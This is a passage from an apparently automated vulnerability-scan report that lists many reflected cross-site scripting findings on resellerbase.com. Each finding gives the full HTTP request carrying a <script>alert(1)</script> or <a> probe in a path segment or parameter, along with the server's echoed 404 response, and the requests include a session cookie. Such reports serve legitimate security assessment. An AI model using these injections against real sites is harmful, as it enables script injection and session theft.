<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/ratingc865d<script>alert(1)</script>ce381fb61ea/4half.gif was not found on this server.</p>
...[SNIP]...

2.958. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/4half.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 2a017<script>alert(1)</script>ed6509640fa was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images/rating/4half.gif2a017<script>alert(1)</script>ed6509640fa HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/rating/4half.gif2a017<script>alert(1)</script>ed6509640fa was not found on this server.</p>
...[SNIP]...

2.959. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fce78<script>alert(1)</script>4678ef8ebb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images/rating/4half.gif?fce78<script>alert(1)</script>4678ef8ebb6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/rating/4half.gif?fce78<script>alert(1)</script>4678ef8ebb6=1 was not found on this server.</p>
...[SNIP]...

2.960. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 25179<script>alert(1)</script>3319997e524 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail25179<script>alert(1)</script>3319997e524/11/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail25179<script>alert(1)</script>3319997e524/11/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.961. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 79856<script>alert(1)</script>ec7d0044beb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1179856<script>alert(1)</script>ec7d0044beb/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1179856<script>alert(1)</script>ec7d0044beb/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.962. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 75f45<script>alert(1)</script>12358be191a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes75f45<script>alert(1)</script>12358be191a/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes75f45<script>alert(1)</script>12358be191a/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.963. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2f624<script>alert(1)</script>fdbd2b6172f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos2f624<script>alert(1)</script>fdbd2b6172f/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos2f624<script>alert(1)</script>fdbd2b6172f/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.964. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3f9d4<script>alert(1)</script>7db9e7062b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images3f9d4<script>alert(1)</script>7db9e7062b/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images3f9d4<script>alert(1)</script>7db9e7062b/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.965. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d696c<script>alert(1)</script>8324f886ad5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images/ratingd696c<script>alert(1)</script>8324f886ad5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/ratingd696c<script>alert(1)</script>8324f886ad5/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.966. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 99543<script>alert(1)</script>b43d08c3919 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images/rating/search.php99543<script>alert(1)</script>b43d08c3919?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/rating/search.php99543<script>alert(1)</script>b43d08c3919?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.967. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 6cd0c<a>ac6faa64184 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search6cd0c<a>ac6faa64184&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search6cd0c<a>ac6faa64184&opt=2 was not found on this server.</p>
...[SNIP]...

2.968. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f40d6<a>489b2a1ac78 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/kosmos/images/rating/search.php?keyword=search...f40d6<a>489b2a1ac78&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/rating/search.php?keyword=search...f40d6<a>489b2a1ac78&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.969. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1473a<script>alert(1)</script>acc172def0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&1473a<script>alert(1)</script>acc172def0c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&1473a<script>alert(1)</script>acc172def0c=1 was not found on this server.</p>
...[SNIP]...

2.970. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b3d4b<a>ccfcceb150e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2b3d4b<a>ccfcceb150e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2b3d4b<a>ccfcceb150e was not found on this server.</p>
...[SNIP]...

2.971. http://www.resellerbase.com/detail/11/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9dffd<script>alert(1)</script>df047ab7161 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9dffd<script>alert(1)</script>df047ab7161/11/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9dffd<script>alert(1)</script>df047ab7161/11/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.972. http://www.resellerbase.com/detail/11/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dc5fa<script>alert(1)</script>85b590407ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11dc5fa<script>alert(1)</script>85b590407ec/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11dc5fa<script>alert(1)</script>85b590407ec/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.973. http://www.resellerbase.com/detail/11/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c318b<script>alert(1)</script>01d91dcff7e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themesc318b<script>alert(1)</script>01d91dcff7e/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themesc318b<script>alert(1)</script>01d91dcff7e/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.974. http://www.resellerbase.com/detail/11/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1dc29<script>alert(1)</script>839dc6516b6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos1dc29<script>alert(1)</script>839dc6516b6/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos1dc29<script>alert(1)</script>839dc6516b6/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.975. http://www.resellerbase.com/detail/11/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 171ee<script>alert(1)</script>fe19e789393 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images171ee<script>alert(1)</script>fe19e789393/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
